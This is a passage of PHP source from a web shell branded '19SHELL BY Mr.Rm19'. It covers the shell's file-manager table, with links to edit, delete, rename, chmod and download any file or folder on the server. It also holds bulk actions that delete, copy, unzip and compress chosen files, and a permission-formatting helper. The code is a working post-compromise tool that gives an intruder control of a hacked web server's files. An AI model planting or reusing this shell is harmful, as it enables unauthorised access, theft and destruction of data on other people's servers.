1564 <td>'.perms("$d/$dir").'</td><td>DIR</td><td>'.date('d M Y | H:m',filemtime("$d/$dir")).'</td><td style="width:20%;max-width:400px;">
1565 [<a href="?act='.$d.'&rmdir='.$d.'/'.$dir.'">delete</a>][<a href="?act='.$d.'&rename='.$d.'/'.$dir.'">rename</a>][<a href="?act='.$d.'&chmod='.$d.'/'.$dir.'">chmod</a>]</td></tr>';
1566}
1567foreach ($sdir as $file) {
1568 if(!is_file("$d/$file"))continue;
1569 $size = filesize("$d/$file")/1024;
1570$size = round($size,3);
1571if($size >= 1024){
1572$size = round($size/1024,2).' MB';
1573}else{
1574$size = $size.' KB';
1575}
1576 echo'
1577 <tr class="hover">
1578 <td>'.$no++.'</td><td><input type="checkbox" name="cekf[]" value="'.$d.'/'.$file.'"></td><td style="width:20%;max-width:500px;">'.icon_file.'
1579 -<a href="?act='.$d.'&src='.$d.'/'.$file.'">'.substr($file,0,40).'</a></td>
1580 <td>'.perms("$d/$file").'</td><td>'.$size.'</td><td>'.date('d M Y | H:m',filemtime("$d/$file")).'</td><td style="width:20%;max-width:400px;">
1581 [<a href="?act='.$d.'&edit='.$d.'/'.$file.'">edit</a>][<a href="?act='.$d.'&rm='.$d.'/'.$file.'">delete</a>][<a href="?act='.$d.'&rename='.$d.'/'.$file.'">rename</a>][<a href="?act='.$d.'&chmod='.$d.'/'.$file.'">chmod</a>][<a href="?act='.$d.'&download='.$d.'/'.$file.'">Download</a>]</td></tr>';
1582}
1583
1584echo'
1585<tr>
1586<td colspan="3">
1587<select name="select">
1588<option> action selected files</option>
1589<option value="del">delete</option>
1590<option value="copy">backUp</option>
1591<option value="unzip">unzip</option>
1592<option value="gz">compress .gz</option>
1593<option value="tar"> compress .tar.gz </option>
1594</select>
1595<input type="submit" name="sbmt" value=">>" >
1596</form></td><td><form method="post">
1597font size : <input type="number" name="fz" value="'.$fz.'"><input type="submit" name="submitfz" value=">>"></form></td><td><form method="post">
1598background: <input type="color" name="bgcolor" value="'.$bg.'"><input type="submit" name="submitbg" value=">>"></form></td><td><form method="post">
1599font color: <input type="color" name="color" value="'.$col.'"><input type="submit" name="submitcol" value=">>"></form></td><td>responsive mode : '.$resmod.' </td></tr>
1600</table>';
1601
1602if(isset($_POST['sbmt'])){
1603 $file=$_POST['cekf'];
1604 $dir=$_POST['cekd'];
1605 if($_POST['select']=='del'){
1606 if($_POST['cekf']){
1607
1608 foreach ($file as $cekf) {
1609 if(unlink($cekf)){
1610 echo"<meta http-equiv='refresh' content=0;url=>";
1611 }
1612 }
1613 }
1614 if($_POST['cekd']){
1615
1616 foreach ($dir as $cekd) {
1617 if(rmdir($cekd)){
1618 echo"<meta http-equiv='refresh' content=0;url=>";
1619 }
1620 }}}elseif($_POST['select']=='copy'){
1621if($_POST['cekf']){
1622
1623 foreach ($file as $copy) {
1624 $copi=basename($copy);
1625 if(!file_exists("45backUp")){
1626 @mkdir('45backUp');
1627 }
1628 if(copy($copy,"45backUp/".basename($copy))){
1629 echo"[<font color=lime>OK</font>]--> <a href='?act=".dirname($copy)."/45backUp&src=".dirname($copy)."/45backUp/".basename($copy)."'> ".basename($copy)." </a><br>";
1630 }else{
1631 echo "[<font color=grey>FAIL</font>]--> 45backUp/".basename($Copy)."<br>";
1632 }
1633 }
1634}
1635}elseif ($_POST['select']=='unzip') {
1636 @mkdir("45extracted");
1637 foreach ($file as $unzip) {
1638 $zip = new ZipArchive;
1639$res = $zip->open($unzip);
1640
1641if ($res === TRUE) {
1642
1643$zip->extractTo("45extracted/");
1644
1645$zip->close();
1646 echo "[<font color=lime>OK</font>] extracted !<br>";
1647 } else {
1648
1649echo "[<font color=grey>FAIL</font>] feiled!";
1650 }
1651 }
1652}elseif($_POST['select']=='gz'){
1653 if($_POST['cekf']){
1654 if(!file_exists("45compressed")){
1655 @mkdir("45compressed");
1656 }
1657foreach($file as $gz){
1658$gzfile = "45compressed/".basename($gz).".gz";
1659$fp = gzopen($gzfile, 'w9');
1660if(gzwrite($fp, file_get_contents($gz))){
1661 echo"[<font color=lime> OK </font>] Compressed !!--> <a href='?45=".dirname($gz)."/45compressed'>here</a>";
1662}
1663gzclose($fp);
1664
1665}
1666}
1667}elseif ($_POST['select']=='tar') {
1668 try
1669{
1670 $a = new PharData('45archive.tar');
1671foreach($file as $tar){
1672 $a->addFile($tar);
1673}
1674 $a->compress(Phar::GZ);
1675 @unlink('45archive.tar');
1676}
1677catch (Exception $e)
1678{
1679 echo "Exception : " . $e;
1680}
1681}
1682}
1683}
1684function perms($file){
1685$perms = fileperms($file);
1686
1687if (($perms & 0xC000) == 0xC000) {
1688// Socket
1689$info = 's';
1690} elseif (($perms & 0xA000) == 0xA000) {
1691// Symbolic Link
1692$info = 'l';
1693} elseif (($perms & 0x8000) == 0x8000) {
1694// Regular
1695$info = '-';
1696} elseif (($perms & 0x6000) == 0x6000) {
1697// Block special
1698$info = 'b';
1699} elseif (($perms & 0x4000) == 0x4000) {
1700// Directory
1701$info = 'd';
1702} elseif (($perms & 0x2000) == 0x2000) {
1703// Character special
1704$info = 'c';
1705} elseif (($perms & 0x1000) == 0x1000) {
1706// FIFO pipe
1707$info = 'p';
1708} else {
1709// Unknown
1710$info = 'u';
1711}
1712
1713// Owner
1714$info .= (($perms & 0x0100) ? 'r' : '-');
1715$info .= (($perms & 0x0080) ? 'w' : '-');
1716$info .= (($perms & 0x0040) ?
1717(($perms & 0x0800) ? 's' : 'x' ) :
1718(($perms & 0x0800) ? 'S' : '-'));
1719
1720// Group
1721$info .= (($perms & 0x0020) ? 'r' : '-');
1722$info .= (($perms & 0x0010) ? 'w' : '-');
1723$info .= (($perms & 0x0008) ?
1724(($perms & 0x0400) ? 's' : 'x' ) :
1725(($perms & 0x0400) ? 'S' : '-'));
1726
1727// World
1728$info .= (($perms & 0x0004) ? 'r' : '-');
1729$info .= (($perms & 0x0002) ? 'w' : '-');
1730$info .= (($perms & 0x0001) ?
1731(($perms & 0x0200) ? 't' : 'x' ) :
1732(($perms & 0x0200) ? 'T' : '-'));
1733
1734return $info;
1735}
1736?>
1737<div style="font-size:11px;position:fixed;bottom:0;left:0;">
1738copyright © <?php echo date('Y');?> | 19SHELL BY Mr.Rm19| <a href="http://facebook.com/c0d3c0d3c0d3"> facebook me clik here!</a>
1739</div>
1740</body>
1741</html>